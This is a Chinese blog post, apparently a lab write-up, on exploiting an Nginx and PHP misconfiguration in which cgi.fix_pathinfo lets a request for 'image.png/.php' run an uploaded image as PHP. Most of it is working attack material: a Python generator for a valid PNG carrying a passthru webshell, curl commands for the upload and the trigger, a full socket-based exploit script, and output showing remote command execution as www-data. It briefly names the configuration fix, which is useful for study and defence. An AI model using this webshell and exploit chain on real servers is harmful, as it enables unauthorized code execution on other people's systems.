Nginx 解析漏洞利用总结

原创 于 2026-06-15 01:56:02 发布 · 222 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全 #nginx

漏洞信息

项目内容
漏洞类型Nginx配置不当导致文件解析漏洞
靶场版本Nginx 1.11.13 + PHP 7.1.3
影响范围任何使用不安全配置的Nginx+PHP环境
靶机地址http://192.168.229.60
暴露端口80

漏洞原理

该漏洞与 Nginx、PHP 版本无关,属于用户配置不当造成的解析漏洞。

Nginx 配置中通过 location ~ \.php$ 将 PHP 文件交给 PHP-FPM 处理:

location ~ \.php$ {
    fastcgi_index  index.php;
    include        fastcgi_params;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
    fastcgi_pass   php:9000;
}

当请求 shell.png/.php 时:

GET /uploadfiles/shell.png/.php HTTP/1.1
                    ↑  Nginx 匹配到 \.php$ → 传给 PHP-FPM
                      PHP-FPM 收到 SCRIPT_FILENAME = /var/www/html/uploadfiles/shell.png
                      发现 .php 后缀 → 尝试执行 shell.png 中的 PHP 代码

  • Nginx 的 \.php$ 匹配到 .php 结尾 → 传给 PHP-FPM

  • PHP-FPM 中的 cgi.fix_pathinfo=1 导致 PHP 去除 /.php 后缀,实际执行的是 shell.png

  • PNG 文件中的 PHP 代码被成功执行

攻击步骤

Step 1:制作合法的PNG图片并嵌入PHP代码

创建一个 1x1 像素的合法 PNG 文件,并在末尾追加 PHP webshell:

import struct, zlib
​
# PNG header
sig = b'\x89PNG\r\n\x1a\n'
# IHDR chunk (1x1 RGB)
ihdr_data = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0)
ihdr = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', zlib.crc32(b'IHDR' + ihdr_data) & 0xffffffff)
# IDAT chunk
raw_data = zlib.compress(b'\x00\xff\x00\x00')
idat = struct.pack('>I', len(raw_data)) + b'IDAT' + raw_data + struct.pack('>I', zlib.crc32(b'IDAT' + raw_data) & 0xffffffff)
# IEND chunk
iend = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', zlib.crc32(b'IEND') & 0xffffffff)
​
# 合成PNG
png_data = sig + ihdr + idat + iend
​
# 在PNG后面追加PHP代码(用passthru替代system,避免参数类型报错)
php_code = b'<?php passthru($_GET["cmd"]); ?>'
webshell = png_data + php_code
​
with open('s.png', 'wb') as f:
    f.write(webshell)

注意: 使用 passthru()system() 更稳定。system("$_GET['cmd']") 在某些场景下会报 "expects parameter 1 to be string, array given" 错误。

Step 2:上传webshell

上传这个嵌入PHP代码的合法PNG图片:

curl -s -F "file_upload=@s.png" http://192.168.229.60/index.php

上传验证逻辑:

// getimagesize() 检测是否合法图片
if(!getimagesize($_FILES['file_upload']['tmp_name'])){
    die('Please ensure you are uploading an image.');
}
// 白名单检测扩展名
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
    die('Unsupported filetype uploaded.');
}

  • getimagesize() 检测通过 ✅(文件是合法PNG)

  • pathinfo() 扩展名检测 → .png → 白名单通过 ✅

文件名重命名规则:

$new_name = __DIR__ . '/uploadfiles/' . md5($_FILES['file_upload']['name']) . ".{$ext}";

上传后文件名变为 md5("s.png") + ".png"

Step 3:利用解析漏洞执行代码

# 用md5sum算文件名
FN=$(echo -n "s.png" | md5sum | cut -d' ' -f1)
​
# 触发解析漏洞
curl "http://192.168.229.60/uploadfiles/${FN}.png/.php?cmd=id" --output - 2>/dev/null

Step 4:验证RCE

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
​
$ cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"

Python版完整利用脚本

import struct, zlib, hashlib, socket
​
# 1. 生成合法PNG + PHP webshell
sig = b'\x89PNG\r\n\x1a\n'
ihdr_data = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0)
ihdr = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', zlib.crc32(b'IHDR' + ihdr_data) & 0xffffffff)
raw_data = zlib.compress(b'\x00\xff\x00\x00')
idat = struct.pack('>I', len(raw_data)) + b'IDAT' + raw_data + struct.pack('>I', zlib.crc32(b'IDAT' + raw_data) & 0xffffffff)
iend = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', zlib.crc32(b'IEND') & 0xffffffff)
png_data = sig + ihdr + idat + iend + b'<?php passthru($_GET["cmd"]); ?>'
​
# 2. 上传
s = socket.socket()
s.connect(('192.168.229.60', 80))
boundary = b'----B'
body = (b'--' + boundary + b'\r\n' +
        b'Content-Disposition: form-data; name="file_upload"; filename="s.png"\r\n' +
        b'Content-Type: image/png\r\n\r\n' +
        png_data + b'\r\n' +
        b'--' + boundary + b'--\r\n')
req = (b'POST /index.php HTTP/1.1\r\nHost: 192.168.229.60\r\n' +
       b'Content-Type: multipart/form-data; boundary=' + boundary + b'\r\n' +
       b'Content-Length: ' + str(len(body)).encode() + b'\r\nConnection: close\r\n\r\n' + body)
s.send(req)
s.close()
​
# 3. 触发解析漏洞
md5name = hashlib.md5(b's.png').hexdigest()
s2 = socket.socket()
s2.connect(('192.168.229.60', 80))
req2 = (f'GET /uploadfiles/{md5name}.png/.php?cmd=id HTTP/1.1\r\n'
        f'Host: 192.168.229.60\r\nConnection: close\r\n\r\n').encode()
s2.send(req2)
resp = b''
while True:
    try:
        d = s2.recv(4096)
        if not d: break
        resp += d
    except: break
s2.close()
print(resp.decode('utf-8', errors='replace'))

Nginx 原始配置文件

server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /usr/share/nginx/html;
    index index.html index.php;
    server_name _;
​
    location / {
        try_files $uri $uri/ =404;
    }
​
    location ~ \.php$ {
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param  REDIRECT_STATUS    200;
        fastcgi_param  SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
        fastcgi_param  DOCUMENT_ROOT /var/www/html;
        fastcgi_pass php:9000;
    }
}

PHP 上传代码

<?php
if (!empty($_FILES)):
    // getimagesize() 检测是否合法图片
    if(!getimagesize($_FILES['file_upload']['tmp_name'])){
        die('Please ensure you are uploading an image.');
    }
    // 白名单检测扩展名
    $ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
    if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
        die('Unsupported filetype uploaded.');
    }
    // 重命名:MD5(name).扩展名
    $new_name = __DIR__ . '/uploadfiles/' . md5($_FILES['file_upload']['name']) . ".{$ext}";
    move_uploaded_file($_FILES['file_upload']['tmp_name'], $new_name);
    die('File uploaded successfully: ' . $new_name);
endif;
?>
<form method="post" enctype="multipart/form-data">
    File: <input type="file" name="file_upload">
    <input type="submit">
</form>

关键要点总结

  1. /.php后缀触发解析:Nginx匹配\.php$后将非法PHP文件交给PHP-FPM执行

  2. PHP的cgi.fix_pathinfo=1:PHP自动删除路径中的/.php,尝试执行前面的文件

  3. 合法PNG+PHP代码:PNG是合法的(getimagesize()通过),但末尾的PHP代码被PHP解释器执行

  4. 与CVE-2013-4547的区别:这里不需要空格、空字节、原始socket,URL路径直接用

  5. 上传后文件名重命名md5(filename).ext,需计算MD5才能找到文件路径

  6. passthru替代system:此处使用passthru()system()更稳定,避免参数类型报错

  7. ⚠️ 该漏洞不是Nginx或PHP的代码漏洞,纯属配置不当。升级软件无法修复,需修改配置(如security.limit_extensions

验证结果

$ curl "http://192.168.229.60/uploadfiles/f7e9f256e015b7895623b123d13d2917.png/.php?cmd=id" --output - 2>/dev/null
PNG...
​
IHDwS
 ݉DATxc󾁁ʾND®B`uid=33(www-data) gid=33(www-data) groups=33(www-data)
​
$ curl "http://192.168.229.60/uploadfiles/f7e9f256e015b7895623b123d13d2917.png/.php?cmd=whoami" --output - 2>/dev/null
PNG...B`www-data
​
$ curl "http://192.168.229.60/uploadfiles/f7e9f256e015b7895623b123d13d2917.png/.php?cmd=hostname" --output - 2>/dev/null
PNG...B`79a73f4f4d3a

楠目
关注
nginx解析漏洞利用
huzenhuzen的专栏
05-01 1652
nginx解析漏洞利用 那么假设存在一个http://www.target.com/jpg.jpg,我们以如下的方式去访问 http://www.target.com/jpg.jpg/php.php 将会得到一个URI /jpg.jpg/php.php 经过location指令,该请求将会交给后端的fastcgi处理,nginx为其设置环境变量SCRIPT_FILENAME,内容为
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 8361
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
nginx php解析漏洞,nginx解析漏洞利用
weixin_32950005的博客
03-28 685
nginx 0.7.65以下(0.5.*, 0.6.*, 0.7.*)全版本系列和0.8.37(0.8.*)以下8系列受影响。环境搭建:win2003+php+nginx0.7.641.修改php配置文件找到;extension=php_mysql.dll;extension=php_mysqli.dll前面指定了php的ext路径后,只要把需要的扩展包前面所对应的“;”去掉,就可以了。这里打开p...
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3865
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
服务器解析漏洞有哪些?IIS\APACHE\NGINX解析漏洞利用
白帽黑客八哥的博客
12-19 2638
解析漏洞是指在Web服务器处理用户请求时,对输入数据(如文件名、参数等)进行解析时产生的漏洞。这种漏洞可能导致服务器对用户提供的数据进行错误解析,使攻击者能够执行未经授权的操作。解析漏洞通常涉及到对用户输入的信任不足,攻击者可以通过构造恶意输入来绕过服务器的安全机制。
CVE-2013-4547 Nginx URI解析漏洞利用总结
2301_81140745的博客
06-14 225
✅空格+空字节是漏洞核心,必须用原始字节发送✅ 上传文件名末尾必须带空格(文件系统支持)✅ PHP的pathinfo()不会trim空格 → 扩展名校验绕过✅ Nginx 1.4.2 location匹配被空字节截断 → 认为以.php结尾✅ PHP-FPM收到的文件名是带空格版本 → 能找到实际文件并执行⚠️ 普通curl的-F参数会trim掉文件名末尾空格 →必须用原始socket发送。
从配置到利用:深度剖析phpStudy nginx解析漏洞的成因与实战复现
weixin_30621465的博客
06-11 199
本文深度剖析了phpStudy与nginx组合中的解析漏洞成因与实战复现方法。通过分析nginx 1.15.11版本的路径解析缺陷与PHP的cgi.fix_pathinfo配置,揭示了攻击者如何利用图片文件执行恶意代码的完整链条,并提供了详细的漏洞复现步骤与防御建议。
nginx php解析漏洞,CVE-2013-4547 Nginx解析漏洞深入利用及分析
weixin_34932795的博客
03-28 859
Nginx历史上曾出现过多次解析漏洞,比如80sec发现的解析漏洞,以及后缀名后直接添加%00截断导致代码执行的解析漏洞。但是在2013年底,nginx再次爆出漏洞(CVE-2013-4547),此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6,范围较广。为了更深入的了解漏洞产生的原因,笔者根据官方补丁(http://nginx.org/download/pa...
Nginx解析与文件逻辑漏洞浮现利用
prohet的博客
03-01 584
环境均搭建的vulhub。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
热门推荐
weixin_59086772的博客
10-18 1万+
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
团队共用图纸频繁乱码怎么办?下载统一方案集体解决.rar
06-19
解决CAD图纸文字变问号、文字变乱码,欢迎下载!
易语言源码易语言API监控TCP连接源码
06-19
易语言源码易语言API监控TCP连接源码
看图软件查看 DWG 图纸问号?下载看图专用字体库.zip
06-19
彻底解决CAD图纸文字变问号、文字变乱码,以及其他所有字体缺失带来的烦恼
易语言源码易语言16进制转10进制
06-19
易语言源码易语言16进制转10进制
中医ai前端.zip
06-19
多智能体ai中医大师系统,模仿张仲景、张锡纯等经方大师,根据历代名医病案及现代中医医学研究,综合给出中医治疗方案,并严格审核方剂配伍,堪比一小型中医国医大师诊所
卓教一体化管理平台.pptx
最新发布
06-19
卓教一体化管理平台.pptx
Screenshot_2026-06-19-11-00-20-68.jpg
06-19
Screenshot_2026-06-19-11-00-20-68.jpg
实用代码脚本易语言源码易用通讯录
06-19
实用代码脚本易语言源码易用通讯录
学联智慧教学中枢.pptx
06-19
学联智慧教学中枢.pptx
三相桥式全控整流及有源逆变电路实验仿真模型,三相整流器逆变器研究(Simulink仿真实现)
06-19
内容概要:本文介绍了一个关于三相桥式全控整流及有源逆变电路的实验仿真模型,重点研究三相整流器与逆变器在Simulink环境下的建模与仿真技术。内容涵盖电力电子变换器的工作原理、控制策略设计、系统动态响应分析,并进一步扩展至10kV配电网中不同中性点接地方式(中性点不接地、经小电阻接地、经消弧线圈接地)下的单相、两相短路接地及相间短路故障的仿真研究,全面呈现了电力系统典型故障的暂态特性。此外,文档还整合了丰富的科研资源,涵盖电力系统优化、新能源并网、故障诊断、微电网调度等多个前沿方向,充分体现了Matlab/Simulink在电气工程仿真中的核心地位和广泛应用价值。; 适合人群:电气工程、自动化、电力电子等相关专业的高校学生、科研人员及工程技术人员,具备一定的电路理论基础和仿真软件操作经验者更佳。; 使用场景及目标:①用于教学实验中帮助理解三相整流与逆变电路的工作机制;②支撑科研项目中对电力系统故障特性的建模与分析;③作为开发新型控制算法(如PWM控制、低电压穿越等)的仿真验证平台;④辅助完成毕业设计、课题研究或工程方案评估; 阅读建议:此资源以Simulink仿真实现为核心,强调理论与实践结合,建议读者在学习过程中同步搭建模型,动手调试参数,深入理解各模块功能与系统整体行为,同时可参考文中提供的完整资源链接拓展研究视野。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值